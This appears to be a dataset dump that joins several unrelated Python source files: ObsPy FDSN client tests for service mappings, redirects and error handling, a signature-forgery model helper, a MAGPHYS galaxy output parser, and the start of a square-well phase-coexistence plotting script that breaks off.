try:\n Client(base_url=base_url, major_versions=major_versions)\n except FDSNException:\n pass\n expected_urls = sorted([\n \"%s/fdsnws/event/7/contributors\" % base_url,\n \"%s/fdsnws/event/7/catalogs\" % base_url,\n \"%s/fdsnws/event/7/application.wadl\" % base_url,\n \"%s/fdsnws/station/8/application.wadl\" % base_url,\n \"%s/fdsnws/dataselect/9/application.wadl\" % base_url,\n ])\n got_urls = sorted([_i[0][0] for _i in\n download_url_mock.call_args_list])\n assert expected_urls == got_urls\n\n # Replace only some\n download_url_mock.reset_mock()\n download_url_mock.return_value = (404, None)\n major_versions = {\"event\": 7, \"station\": 8}\n # An exception will be raised if not actual WADLs are returned.\n try:\n Client(base_url=base_url, major_versions=major_versions)\n except FDSNException:\n pass\n expected_urls = sorted([\n \"%s/fdsnws/event/7/contributors\" % base_url,\n \"%s/fdsnws/event/7/catalogs\" % base_url,\n \"%s/fdsnws/event/7/application.wadl\" % base_url,\n \"%s/fdsnws/station/8/application.wadl\" % base_url,\n \"%s/fdsnws/dataselect/1/application.wadl\" % base_url,\n ])\n got_urls = sorted([_i[0][0] for _i in\n download_url_mock.call_args_list])\n assert expected_urls == got_urls\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_setting_service_provider_mappings(self, download_url_mock):\n \"\"\"\n Tests the setting of per service endpoints\n \"\"\"\n base_url = \"http://example.com\"\n\n # Replace all.\n download_url_mock.return_value = (404, None)\n # Some custom urls\n base_url_event = \"http://other_url.com/beta/event_service/11\"\n base_url_station = \"http://some_url.com/beta2/stat_serv/7\"\n base_url_ds = \"http://new.com/beta3/waveforms/8\"\n # An exception will be raised if not actual WADLs are returned.\n try:\n Client(base_url=base_url, service_mappings={\n \"event\": base_url_event,\n \"station\": base_url_station,\n \"dataselect\": base_url_ds,\n })\n except FDSNException:\n pass\n expected_urls = sorted([\n \"%s/contributors\" % base_url_event,\n \"%s/catalogs\" % base_url_event,\n \"%s/application.wadl\" % base_url_event,\n \"%s/application.wadl\" % base_url_station,\n \"%s/application.wadl\" % base_url_ds,\n ])\n got_urls = sorted([_i[0][0] for _i in\n download_url_mock.call_args_list])\n assert expected_urls == got_urls\n\n # Replace only two. The others keep the default mapping.\n download_url_mock.reset_mock()\n download_url_mock.return_value = (404, None)\n # Some custom urls\n base_url_station = \"http://some_url.com/beta2/stat_serv/7\"\n base_url_ds = \"http://new.com/beta3/waveforms/8\"\n # An exception will be raised if not actual WADLs are returned.\n try:\n Client(base_url=base_url, service_mappings={\n \"station\": base_url_station,\n \"dataselect\": base_url_ds,\n })\n except FDSNException:\n pass\n expected_urls = sorted([\n \"%s/fdsnws/event/1/contributors\" % base_url,\n \"%s/fdsnws/event/1/catalogs\" % base_url,\n \"%s/fdsnws/event/1/application.wadl\" % base_url,\n \"%s/application.wadl\" % base_url_station,\n \"%s/application.wadl\" % base_url_ds,\n ])\n got_urls = sorted([_i[0][0] for _i in\n download_url_mock.call_args_list])\n assert expected_urls == got_urls\n\n def test_manually_deactivate_single_service(self):\n \"\"\"\n Test manually deactivating a single service.\n \"\"\"\n client = Client(base_url=\"IRIS\", user_agent=USER_AGENT,\n service_mappings={\"event\": None})\n assert sorted(client.services.keys()) == ['dataselect', 'station']\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_download_urls_for_custom_mapping(\n self, download_url_mock, testdata):\n \"\"\"\n Tests the downloading of data with custom mappings.\n \"\"\"\n base_url = \"http://example.com\"\n\n # More extensive mock setup simulation service discovery.\n def custom_side_effects(*args, **kwargs):\n if \"version\" in args[0]:\n return 200, \"1.0.200\"\n elif \"event\" in args[0]:\n with open(testdata[\"2014-01-07_iris_event.wadl\"], \"rb\") as fh:\n return 200, fh.read()\n elif \"station\" in args[0]:\n with open(testdata[\"2014-01-07_iris_station.wadl\"],\n \"rb\") as fh:\n return 200, fh.read()\n elif \"dataselect\" in args[0]:\n with open(testdata[\"2014-01-07_iris_dataselect.wadl\"],\n \"rb\") as fh:\n return 200, fh.read()\n return 404, None\n\n download_url_mock.side_effect = custom_side_effects\n\n # Some custom urls\n base_url_event = \"http://example.com/beta/event_service/11\"\n base_url_station = \"http://example.org/beta2/station/7\"\n base_url_ds = \"http://example.edu/beta3/dataselect/8\"\n\n # An exception will be raised if not actual WADLs are returned.\n # Catch warnings to avoid them being raised for the tests.\n with warnings.catch_warnings(record=True) as w:\n warnings.simplefilter(\"always\")\n c = Client(base_url=base_url, service_mappings={\n \"event\": base_url_event,\n \"station\": base_url_station,\n \"dataselect\": base_url_ds,\n })\n for warning in w:\n assert \"Could not parse\" in str(warning) or \\\n \"cannot deal with\" in str(warning)\n\n # Test the dataselect downloading.\n download_url_mock.reset_mock()\n download_url_mock.side_effect = None\n download_url_mock.return_value = 404, None\n try:\n c.get_waveforms(\"A\", \"B\", \"C\", \"D\", UTCDateTime() - 100,\n UTCDateTime())\n except Exception:\n pass\n assert base_url_ds in download_url_mock.call_args_list[0][0][0]\n\n # Test the station downloading.\n download_url_mock.reset_mock()\n download_url_mock.side_effect = None\n download_url_mock.return_value = 404, None\n try:\n c.get_stations()\n except Exception:\n pass\n assert base_url_station in download_url_mock.call_args_list[0][0][0]\n\n # Test the event downloading.\n download_url_mock.reset_mock()\n download_url_mock.side_effect = None\n download_url_mock.return_value = 404, None\n try:\n c.get_events()\n except Exception:\n pass\n assert base_url_event in download_url_mock.call_args_list[0][0][0]\n\n def test_redirection(self):\n \"\"\"\n Tests the redirection of GET and POST requests. We redirect\n everything if not authentication is used.\n\n IRIS runs three services to test it:\n http://ds.iris.edu/files/redirect/307/station/1\n http://ds.iris.edu/files/redirect/307/dataselect/1\n http://ds.iris.edu/files/redirect/307/event/1\n \"\"\"\n c = Client(\"IRIS\", service_mappings={\n \"station\":\n \"http://ds.iris.edu/files/redirect/307/station/1\",\n \"dataselect\":\n \"http://ds.iris.edu/files/redirect/307/dataselect/1\",\n \"event\":\n \"http://ds.iris.edu/files/redirect/307/event/1\"},\n user_agent=USER_AGENT)\n\n st = c.get_waveforms(\n network=\"IU\", station=\"ANMO\", location=\"00\", channel=\"BHZ\",\n starttime=UTCDateTime(\"2010-02-27T06:30:00.000\"),\n endtime=UTCDateTime(\"2010-02-27T06:30:01.000\"))\n # Just make sure something is being downloaded.\n assert bool(len(st))\n\n inv = c.get_stations(\n starttime=UTCDateTime(\"2000-01-01\"),\n endtime=UTCDateTime(\"2001-01-01\"),\n network=\"IU\", station=\"ANMO\", level=\"network\")\n # Just make sure something is being downloaded.\n assert bool(len(inv.networks))\n\n cat = c.get_events(starttime=UTCDateTime(\"2001-01-07T01:00:00\"),\n endtime=UTCDateTime(\"2001-01-07T01:05:00\"),\n catalog=\"ISC\")\n # Just make sure something is being downloaded.\n assert bool(len(cat))\n\n # Also test the bulk requests which are done using POST requests.\n bulk = ((\"TA\", \"A25A\", \"\", \"BHZ\",\n UTCDateTime(\"2010-03-25T00:00:00\"),\n UTCDateTime(\"2010-03-25T00:00:01\")),\n (\"TA\", \"A25A\", \"\", \"BHE\",\n UTCDateTime(\"2010-03-25T00:00:00\"),\n UTCDateTime(\"2010-03-25T00:00:01\")))\n st = c.get_waveforms_bulk(bulk, quality=\"B\", longestonly=False)\n # Just make sure something is being downloaded.\n assert bool(len(st))\n\n starttime = UTCDateTime(1990, 1, 1)\n endtime = UTCDateTime(1990, 1, 1) + 10\n bulk = [\n [\"IU\", \"ANMO\", \"\", \"BHE\", starttime, endtime],\n [\"IU\", \"CCM\", \"\", \"BHZ\", starttime, endtime],\n ]\n inv = c.get_stations_bulk(bulk, level=\"network\")\n # Just make sure something is being downloaded.\n assert bool(len(inv.networks))\n\n def test_redirection_auth(self):\n \"\"\"\n Tests the redirection of GET and POST requests using authentication.\n\n By default these should not redirect and an exception is raised.\n \"\"\"\n # Clear the cache.\n Client._Client__service_discovery_cache.clear()\n\n # The error will already be raised during the initialization in most\n # cases.\n service_mappings = {\n \"station\": \"http://ds.iris.edu/files/redirect/307/station/1\",\n \"dataselect\": \"http://ds.iris.edu/files/redirect/307/dataselect/1\",\n \"event\": \"http://ds.iris.edu/files/redirect/307/event/1\"}\n with warnings.catch_warnings():\n # ignore warnings about unclosed sockets\n # These occur when rasing the FDSNRedirectException, but\n # I was not able to fix in the code\n warnings.filterwarnings('ignore', 'unclosed')\n with pytest.raises(FDSNRedirectException):\n Client(\"IRIS\", service_mappings=service_mappings,\n user=\"nobody@iris.edu\", password=\"anonymous\",\n user_agent=USER_AGENT)\n # The force_redirect flag overwrites that behaviour.\n c_auth = Client(\"IRIS\", service_mappings=service_mappings,\n user=\"nobody@iris.edu\", password=\"anonymous\",\n user_agent=USER_AGENT, force_redirect=True)\n st = c_auth.get_waveforms(\n network=\"IU\", station=\"ANMO\", location=\"00\", channel=\"BHZ\",\n starttime=UTCDateTime(\"2010-02-27T06:30:00.000\"),\n endtime=UTCDateTime(\"2010-02-27T06:30:01.000\"))\n # Just make sure something is being downloaded.\n assert bool(len(st))\n\n inv = c_auth.get_stations(\n starttime=UTCDateTime(\"2000-01-01\"),\n endtime=UTCDateTime(\"2001-01-01\"),\n network=\"IU\", station=\"ANMO\", level=\"network\")\n # Just make sure something is being downloaded.\n assert bool(len(inv.networks))\n\n cat = c_auth.get_events(starttime=UTCDateTime(\"2001-01-07T01:00:00\"),\n endtime=UTCDateTime(\"2001-01-07T01:05:00\"),\n catalog=\"ISC\")\n # Just make sure something is being downloaded.\n assert bool(len(cat))\n\n # Also test the bulk requests which are done using POST requests.\n bulk = ((\"TA\", \"A25A\", \"\", \"BHZ\",\n UTCDateTime(\"2010-03-25T00:00:00\"),\n UTCDateTime(\"2010-03-25T00:00:01\")),\n (\"TA\", \"A25A\", \"\", \"BHE\",\n UTCDateTime(\"2010-03-25T00:00:00\"),\n UTCDateTime(\"2010-03-25T00:00:01\")))\n st = c_auth.get_waveforms_bulk(bulk, quality=\"B\", longestonly=False)\n # Just make sure something is being downloaded.\n assert bool(len(st))\n\n starttime = UTCDateTime(1990, 1, 1)\n endtime = UTCDateTime(1990, 1, 1) + 10\n bulk = [\n [\"IU\", \"ANMO\", \"\", \"BHE\", starttime, endtime],\n [\"IU\", \"CCM\", \"\", \"BHZ\", starttime, endtime],\n ]\n inv = c_auth.get_stations_bulk(bulk, level=\"network\")\n # Just make sure something is being downloaded.\n assert bool(len(inv.networks))\n\n def test_get_waveforms_empty_seed_codes(self):\n \"\"\"\n Make sure that network, station, and channel codes specified as empty\n strings are not omitted in `get_waveforms(...)` when building the url\n (which results in default values '*' (wildcards) at the server,\n see #1578).\n \"\"\"\n t = UTCDateTime(2000, 1, 1)\n url_base = \"http://service.iris.edu/fdsnws/dataselect/1/query?\"\n kwargs = dict(network='IU', station='ANMO', location='00',\n channel='HHZ', starttime=t, endtime=t)\n\n for key in ('network', 'station', 'channel'):\n kwargs_ = kwargs.copy()\n # set empty SEED code for given key\n kwargs_.update(((key, ''),))\n\n # use a mock object and check what URL would have been downloaded\n with mock.patch.object(\n self.client, '_download') as m:\n try:\n self.client.get_waveforms(**kwargs_)\n except Exception:\n # Mocking returns something different.\n continue\n # URL downloading comes before the error and can be checked now\n url = m.call_args[0][0]\n url_parts = url.replace(url_base, '').split(\"&\")\n assert '{}='.format(key) in url_parts\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_no_data_exception(self, download_url_mock):\n \"\"\"\n Verify that a request returning no data raises an identifiable\n exception\n \"\"\"\n download_url_mock.return_value = (204, None)\n with pytest.raises(FDSNNoDataException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_request_too_large_exception(self, download_url_mock):\n \"\"\"\n Verify that a request returning too much data raises an identifiable\n exception\n \"\"\"\n download_url_mock.return_value = (413, None)\n with pytest.raises(FDSNRequestTooLargeException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_authentication_exceptions(self, download_url_mock):\n \"\"\"\n Verify that a request with missing authentication raises an\n identifiable exception\n \"\"\"\n with mock.patch(\"obspy.clients.fdsn.client.Client._has_eida_auth\",\n new_callable=mock.PropertyMock,\n return_value=False):\n with pytest.raises(FDSNNoAuthenticationServiceException):\n Client(eida_token=\"TEST\")\n\n with pytest.raises(FDSNDoubleAuthenticationException):\n Client(\"IRIS\", eida_token=\"TEST\", user=\"TEST\")\n\n download_url_mock.return_value = (401, None)\n with pytest.raises(FDSNUnauthorizedException):\n self.client.get_stations()\n\n download_url_mock.return_value = (403, None)\n with pytest.raises(FDSNForbiddenException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_timeout_exception(self, download_url_mock):\n \"\"\"\n Verify that a request timing out raises an identifiable exception\n \"\"\"\n download_url_mock.return_value = (None, \"timeout\")\n with pytest.raises(FDSNTimeoutException):\n self.client.get_stations()\n\n def test_no_service_exception(self):\n \"\"\"\n Verify that opening a client to a provider without FDSN service raises\n an identifiable exception\n \"\"\"\n with pytest.raises(FDSNNoServiceException):\n Client(\"http://nofdsnservice.org\")\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_not_implemented_exception(self, download_url_mock):\n \"\"\"\n Verify that a client receiving a 501 'Not Implemented' status\n raises an identifiable exception\n \"\"\"\n download_url_mock.return_value = (501, None)\n with pytest.raises(FDSNNotImplementedException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_bad_gateway_exception(self, download_url_mock):\n \"\"\"\n Verify that a client receiving a 502 'Bad Gateway' status\n raises an identifiable exception\n \"\"\"\n download_url_mock.return_value = (502, None)\n with pytest.raises(FDSNBadGatewayException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_service_unavailable_exception(self, download_url_mock):\n \"\"\"\n Verify that opening a client to a service temporarily unavailable\n raises an identifiable exception\n \"\"\"\n download_url_mock.return_value = (503, None)\n with pytest.raises(FDSNServiceUnavailableException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_bad_request_exception(self, download_url_mock):\n \"\"\"\n Verify that a bad request raises an identifiable exception\n \"\"\"\n download_url_mock.return_value = (400, io.BytesIO(b\"\"))\n with pytest.raises(FDSNBadRequestException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_server_exception(self, download_url_mock):\n \"\"\"\n Verify that a server error raises an identifiable exception\n \"\"\"\n download_url_mock.return_value = (500, None)\n with pytest.raises(FDSNInternalServerException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_too_many_requests_exception(self, download_url_mock):\n \"\"\"\n Verify that too many requests raise an identifiable exception\n \"\"\"\n download_url_mock.return_value = (429, None)\n with pytest.raises(FDSNTooManyRequestsException):\n self.client.get_stations()\n\n @pytest.mark.skip(reason='Token is expired')\n def test_eida_token_resolution(self, testdata):\n \"\"\"\n Tests that EIDA tokens are resolved correctly and new credentials get\n installed with the opener of the Client.\n \"\"\"\n token = testdata['eida_token.txt']\n with open(token, 'rb') as fh:\n token_data = fh.read().decode()\n\n def _assert_eida_user_and_password(user, password):\n # user/pass is not static for the static test token\n for value in user, password:\n # seems safe to assume both user and password are at least 10\n # chars long\n # example user/password:\n # wWGgJnH4GvdVY7gDMH21xEpb wDnzlpljqdaCXlP2\n re.match('^[a-zA-Z0-9]{10,}$', value)\n\n def _get_http_digest_auth_handler(client):\n handlers = [h for h in client._url_opener.handlers\n if isinstance(h, urllib_request.HTTPDigestAuthHandler)]\n assert len(handlers) <= 1\n return handlers and handlers[0] or None\n\n def _assert_credentials(client, user, password):\n handler = _get_http_digest_auth_handler(client)\n assert isinstance(handler, urllib_request.HTTPDigestAuthHandler)\n for user_, password_ in handler.passwd.passwd[None].values():\n assert user == user_\n assert password == password_\n\n client = Client('GFZ')\n # this is a plain client, so it should not have http digest auth\n assert _get_http_digest_auth_handler(client) is None\n # now, if we set new user/password, we should get a http digest auth\n # handler\n user, password = (\"spam\", \"eggs\")\n client._set_opener(user=user, password=password)\n _assert_credentials(client, user, password)\n # now, if we resolve the EIDA token, the http digest auth handler\n # should change\n user, password = client._resolve_eida_token(token=token)\n _assert_eida_user_and_password(user, password)\n client._set_opener(user=user, password=password)\n _assert_credentials(client, user, password)\n # do it again, now providing the token data directly as a string (first\n # change the authentication again to dummy user/password\n client._set_opener(user=\"foo\", password=\"bar\")\n _assert_credentials(client, \"foo\", \"bar\")\n user, password = client._resolve_eida_token(token=token_data)\n _assert_eida_user_and_password(user, password)\n client.set_eida_token(token_data)\n _assert_credentials(client, user, password)\n\n # Raise if token and user/pw are given.\n msg = \"EIDA authentication token provided, but user and password \" \\\n \"are also given.\"\n with pytest.raises(FDSNException, match=msg):\n Client('GFZ', eida_token=token, user=\"foo\", password=\"bar\")\n\n # now lets test the RoutingClient with credentials..\n credentials_ = {'geofon.gfz-potsdam.de': {'eida_token': token}}\n credentials_mapping_ = {'GFZ': {'eida_token': token}}\n global_eida_credentials_ = {'EIDA_TOKEN': token}\n for credentials, should_have_credentials in zip(\n (None, credentials_, credentials_mapping_,\n global_eida_credentials_), (False, True, True, True)):\n def side_effect(self_, *args, **kwargs):\n \"\"\"\n This mocks out Client.get_waveforms_bulk which gets called by\n the routing client, checks authentication handlers and returns\n a dummy stream.\n \"\"\"\n # check that we're at the expected FDSN WS server\n assert 'http://geofon.gfz-potsdam.de' == self_.base_url\n # check if credentials were used\n # eida auth availability should be positive in all cases\n assert self_._has_eida_auth\n # depending on whether we specified credentials, the\n # underlying FDSN client should have EIDA authentication\n # flag and should also have a HTTP digest handler with\n # appropriate user/password\n handler = _get_http_digest_auth_handler(self_)\n if should_have_credentials:\n for user, password in handler.passwd.passwd[None].values():\n _assert_eida_user_and_password(user, password)\n else:\n assert handler is None\n # just always return some dummy stream, we're not\n # interested in checking the data downloading which\n # succeeds regardless if auth is used or not as it's public\n # data\n return Stream([Trace(data=np.ones(2))])\n\n with mock.patch(\n 'obspy.clients.fdsn.client.Client.get_waveforms_bulk',\n autospec=True) as p:\n\n p.side_effect = side_effect\n\n routing_client = RoutingClient('eida-routing',\n credentials=credentials)\n # do a waveform request on the routing client which internally\n # connects to the GFZ FDSNWS. this should be done using the\n # above supplied credentials, i.e. should use the given EIDA\n # token to resolve user/password for the normal FDSN queryauth\n # mechanism\n routing_client.get_waveforms(\n network=\"GE\", station=\"KMBO\", location=\"00\", channel=\"BHZ\",\n starttime=UTCDateTime(\"2010-02-27T06:30:00.000\"),\n endtime=UTCDateTime(\"2010-02-27T06:40:00.000\"))\n\n # test invalid token/token file\n with pytest.raises(\n ValueError,\n match='EIDA token does not seem to be a valid PGP message'):\n client = Client('GFZ', eida_token=\"spam\")\n msg = (\"Read EIDA token from file '[^']*event_helpstring.txt' but it \"\n \"does not seem to contain a valid PGP message.\")\n with pytest.raises(ValueError, match=msg):\n client = Client('GFZ', eida_token=testdata['event_helpstring.txt'])\n","repo_name":"obspy/obspy","sub_path":"obspy/clients/fdsn/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":72072,"program_lang":"python","lang":"en","doc_type":"code","stars":1088,"dataset":"github-code","pt":"92"} +{"seq_id":"19616389009","text":"import numpy as np\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\nfrom solutions import similarity_model, distinction_model\n\n# Load the similarity model and its pre-trained weights\nsim_model = similarity_model.get_similarity_model()\nsim_model.load_weights(\n \"/home/anshal/Projects/Signature-Forgery-Detection/models/similarity/signet_english_v3.h5\"\n)\n\n# Load the distinction model and its pre-trained weights\ndis_model = distinction_model.get_disiction_model()\ndis_model.load_weights(\n \"/home/anshal/Projects/Signature-Forgery-Detection/models/distinction/signet_v4.h5\"\n)\n\n\ndef load_and_preprocess_image(\n image_path: str, target_size: tuple = (155, 220), color_mode: str = \"grayscale\"\n):\n \"\"\"\n Load and preprocess an image.\n\n Args:\n image_path (str): The path to the image file.\n target_size (tuple): The target size (height, width) for resizing the image.\n color_mode (str): The color mode for loading the image ('grayscale' or 'rgb').\n\n Returns:\n tuple: A tuple containing a preprocessed image as a NumPy array and the original PIL image object.\n \"\"\"\n # Load the image as a PIL image object\n img = load_img(image_path, target_size=target_size, color_mode=color_mode)\n\n # Convert the image to a NumPy array and scale it\n img_array = img_to_array(img) / 255.0\n\n # Add a dimension to mimic the batch size\n img_array = np.expand_dims(img_array, axis=0)\n\n return img_array, img\n\n\ndef predict_function(image1, image2, threshold: int = 30, use_cross: bool = True):\n \"\"\"\n Predict whether two images represent real or fake signatures.\n\n Args:\n image1 (numpy.ndarray): The preprocessed image data for the first image.\n image2 (numpy.ndarray): The preprocessed image data for the second image.\n threshold (int): The threshold for classifying the images (default is 30).\n use_cross (bool): Whether to use cross-checking with the distinction model (default is True).\n\n Returns:\n str: A string indicating the prediction result.\n \"\"\"\n if use_cross:\n initial_pred = dis_model.predict([image1, image2])\n init_res, similarity = match_results(initial_pred, threshold=threshold)\n print(\"First Check: \", init_res)\n if similarity <= 70:\n return init_res\n\n prediction = sim_model.predict([image1, image2])\n res, _ = match_results(prediction, threshold=threshold)\n\n print(\"Second Check: \", res)\n\n return res\n\n\ndef match_results(prediction: np.ndarray, threshold: int = 30) -> tuple:\n \"\"\"\n Match and classify images based on a prediction.\n\n Args:\n prediction (numpy.ndarray): The prediction result.\n threshold (int): The threshold for classifying the images (default is 30).\n\n Returns:\n tuple: A tuple containing the classification result as a string and the similarity score.\n \"\"\"\n res = \"UNK\"\n similarity = max((1 - prediction[0][0]) * 100, 0)\n\n if prediction[0][0] * 100 < threshold:\n res = f\"Real signature. Similarity = {(similarity):.2f}%, Distance = {prediction[0][0]:.4f}\"\n else:\n res = f\"Fake signature. Similarity = {similarity:.2f}%\"\n\n return res, similarity\n","repo_name":"Anshal55/Signature-Forgery-Detection","sub_path":"solutions/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"855680714","text":"import logging\n\nLOG = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO, format='%(asctime)-15s:' + logging.BASIC_FORMAT)\n\n\nclass Galaxy(object):\n def __init__(self):\n self.gama_id = None\n self.redshift = None\n self.i_sfh = None\n self.i_ir = None\n self.chi2 = None\n\n\nclass FilterValue(object):\n def __init__(self):\n self.filter_id = None\n self.flux = None\n self.sigma = None\n self.flux_bfm = None\n\n\nclass Result(object):\n def __init__(self):\n self.parameter_name_id = None\n self.best_fit = None\n self.percentile2_5 = None\n self.percentile16 = None\n self.percentile50 = None\n self.percentile84 = None\n self.percentile97_5 = None\n\n\nclass ProcessMagphysFile(object):\n def __init__(self, map_filter_in, map_parameter_name_in):\n # Load the filters\n self._map_filter = map_filter_in\n\n # Load the parameter name map\n self._map_parameter_name = map_parameter_name_in\n\n def process_file(self, gama_id, filename):\n \"\"\"\n Process a file\n \"\"\"\n # Reset a lot of the variables\n line = None\n line_number = 0\n list_filters = []\n list_filter_values = []\n map_results = {}\n parameter_name = None\n percentiles_next = False\n galaxy = Galaxy()\n galaxy.gama_id = gama_id\n for key in self._map_parameter_name.keys():\n result = Result()\n result.parameter_name_id = self._map_parameter_name[key]\n map_results[key] = result\n try:\n with open(filename) as f:\n for line in f:\n line_number += 1\n\n if line_number == 2:\n filter_names = line.split()\n list_filters = filter_names[1:]\n\n elif line_number == 3:\n fluxes = line.split()\n i = 0\n for flux in fluxes:\n filter_value = FilterValue()\n filter_name = list_filters[i]\n filter_value.filter_id = self._map_filter[filter_name]\n filter_value.flux = flux\n list_filter_values.append(filter_value)\n i += 1\n\n elif line_number == 4:\n sigmas = line.split()\n i = 0\n for sigma in sigmas:\n filter_value = list_filter_values[i]\n filter_value.sigma = sigma\n i += 1\n\n elif line_number == 9:\n best_fit = line.split()\n if len(best_fit) == 4:\n galaxy.i_sfh = best_fit[0]\n galaxy.i_ir = best_fit[1]\n galaxy.chi2 = best_fit[2]\n galaxy.redshift = best_fit[3]\n else:\n galaxy.i_sfh = 0\n galaxy.i_ir = 0\n galaxy.chi2 = 0\n galaxy.redshift = 0\n LOG.warning('Only {0} arguments from line: {1}'.format(len(best_fit), line))\n if len(best_fit) == 3 and best_fit[1].startswith('0') and best_fit[1].endswith('*'):\n galaxy.i_sfh = best_fit[0]\n galaxy.i_ir = 0\n galaxy.chi2 = 0\n galaxy.redshift = best_fit[2]\n elif line_number == 11:\n best_fits = line.split()\n map_results['f_mu (SFH)'].best_fit = best_fits[0]\n map_results['f_mu (IR)'].best_fit = best_fits[1]\n map_results['mu parameter'].best_fit = best_fits[2]\n map_results['tau_V'].best_fit = best_fits[3]\n map_results['sSFR_0.1Gyr'].best_fit = best_fits[4]\n map_results['M(stars)'].best_fit = best_fits[5]\n map_results['Ldust'].best_fit = best_fits[6]\n map_results['T_W^BC'].best_fit = best_fits[7]\n map_results['T_C^ISM'].best_fit = best_fits[8]\n map_results['xi_C^tot'].best_fit = best_fits[9]\n map_results['xi_PAH^tot'].best_fit = best_fits[10]\n map_results['xi_MIR^tot'].best_fit = best_fits[11]\n map_results['xi_W^tot'].best_fit = best_fits[12]\n map_results['tau_V^ISM'].best_fit = best_fits[13]\n map_results['M(dust)'].best_fit = best_fits[14]\n map_results['SFR_0.1Gyr'].best_fit = best_fits[15]\n\n elif line_number == 13:\n bfms = line.split()\n i = 0\n for bfm in bfms:\n filter_value = list_filter_values[i]\n filter_value.flux_bfm = bfm\n i += 1\n\n elif line_number >= 16:\n if line.startswith(\"# ...\"):\n parts = line.split('...')\n parameter_name = parts[1].strip()\n\n elif line.startswith(\"#....percentiles of the PDF......\"):\n percentiles_next = True\n\n elif percentiles_next:\n values = line.split()\n result = map_results[parameter_name]\n result.percentile2_5 = values[0]\n result.percentile16 = values[1]\n result.percentile50 = values[2]\n result.percentile84 = values[3]\n result.percentile97_5 = values[4]\n percentiles_next = False\n\n except:\n LOG.exception('''Exception after {0} lines\n{1}'''.format(line_number, line))\n\n return galaxy, list_filter_values, map_results\n\n\nif __name__ == \"__main__\":\n map_filter = {\n 'fuv': 0,\n 'nuv': 1,\n 'u': 2,\n 'g': 3,\n 'r': 4,\n 'i': 5,\n 'Z': 6,\n 'Y': 7,\n 'J': 8,\n 'H': 9,\n 'K': 10,\n 'WISEW1': 11,\n 'WISEW2': 12,\n 'WISEW3': 13,\n 'WISEW4': 14,\n 'PACS100': 15,\n 'PACS160': 16,\n 'SPIRE250': 17,\n 'SPIRE350': 18,\n 'SPIRE500': 19,\n }\n map_parameter_name = {\n 'f_mu (SFH)': 0,\n 'f_mu (IR)': 1,\n 'mu parameter': 2,\n 'tau_V': 3,\n 'sSFR_0.1Gyr': 4,\n 'M(stars)': 5,\n 'Ldust': 6,\n 'T_C^ISM': 7,\n 'T_W^BC': 8,\n 'xi_C^tot': 9,\n 'xi_PAH^tot': 10,\n 'xi_MIR^tot': 11,\n 'xi_W^tot': 12,\n 'tau_V^ISM': 13,\n 'M(dust)': 14,\n 'SFR_0.1Gyr': 15,\n 'metalicity Z/Zo': 16,\n 'tform': 17,\n 'gamma': 18,\n 'tlastb': 19,\n 'agem': 20,\n 'ager': 21,\n 'sfr16': 22,\n 'sfr17': 23,\n 'sfr18': 24,\n 'sfr19': 25,\n 'sfr29': 26,\n 'fb16': 27,\n 'fb17': 28,\n 'fb18': 29,\n 'fb19': 30,\n 'fb29': 31,\n }\n process_magphys = ProcessMagphysFile(map_parameter_name, map_filter)\n process_magphys.process_file('00343593', '../data/00343593.f')\n process_magphys.process_file('00861737', '../data/00861737.f')\n","repo_name":"ICRAR/gama-magphys","sub_path":"src/process_magphys_file.py","file_name":"process_magphys_file.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"73880767020","text":"from __future__ import division\nimport numpy as np\nimport sys\nimport matplotlib as mpl\nimport SW\nimport pylab as plt\n\n\n\nfrom matplotlib.path import Path\nfrom matplotlib.patches import PathPatch\n\ndata=np.loadtxt('figs/snaft2.out')\n\nx = plt.linspace(1e-20,.17,40000) # x-axis grid space (used for when plotting number density on x-axis)\n\nxmin=((4*np.pi*(SW.R)**3)/3)*1e-20\nxmax=((4*np.pi*(SW.R)**3)/3)*.17\n#xmin=(3/(4.0*np.pi))*(1e-20)*(1/(SW.R)**3)\n#xmax=(3/(4.0*np.pi))*(0.2)*(1/(SW.R)**3)\nxff = plt.linspace(xmin,xmax,40000)\n\n\n\n\n\n\n\n\nnL = [data[i][1] for i in range(0,len(data))] # list of the left number density solutions obtained from fsolve\nnR = [data[i][2] for i in range(0,len(data))] # list of the right number density solutions obtained from fsolve\nTlist = [data[i][0] for i in range(0,len(data))] # list of the corresponding temperatures for which the above number densitites were found\n\nffL = [i*((4*np.pi*(SW.R)**3)/3) for i in nL] # converts left number density to filling fraction\nffR = [i*((4*np.pi*(SW.R)**3)/3) for i in nR] # converts right number density to filling fraction\n\n\n\ndef liq_vap_Tvsff():\n plt.figure()\n plt.plot(ffL,Tlist,color='#f36118',linewidth=2)\n plt.plot(ffR,Tlist,color='c',linewidth=2)\n plt.xlabel(r'$filling fraction$')\n plt.ylabel(r'$temperature$')\n plt.xlim(-.05,max(ffR)+.05)\n plt.title('liquid-vapor coexistence '+r'$\\lambda_{SW}=1.5$')\n #plt.savefig('figs/liqVapCo_Tvsff.pdf')\n\n\n plt.figure()\n plt.plot(ffL,Tlist,color='#f36118',linewidth=2)\n plt.plot(ffR,Tlist,color='c',linewidth=2)\n plt.xlabel(r'$filling fraction$')\n plt.ylabel(r'$temperature$')\n plt.xlim(-.05,max(ffR)+.05)\n 